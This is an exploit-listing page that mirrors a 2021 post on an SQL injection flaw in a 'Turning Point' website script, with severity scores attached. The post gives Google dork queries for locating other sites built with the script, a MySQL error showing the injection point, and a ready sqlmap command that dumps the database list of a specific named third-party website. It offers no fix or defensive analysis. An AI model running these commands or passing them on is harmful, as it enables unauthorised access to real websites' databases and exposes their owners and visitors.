Advertisement






Turning Point script Sql Injection Vulnerability

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
Exploit Alert Team High Remote 2021-03-21
CPE
cpe:Not Available
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021030138

Below is a copy:

Turning Point script Sql Injection Vulnerability
*********************************************************
#Exploit Title: Turning Point script Sql Injection Vulnerability
#Date: 20.03.2021
#Exploit Author: Thor/Azerbaijan
#Google Dork: "Website designed by: Turning Point"
              inurl:/"Website designed by: Turning Point"
              intext:/"Website designed by: Turning Point"
#Tested OS: Linux/Parrot (SQLMAP TOOL)

ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

#iNJECT MODE: sqlmap -u http://stjgps.org/photo_gallery.php?pid=23 --dbs

********************************************************* 
#Discovered by: Tural Asadov 
#Instagram: @esedov__7.62
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum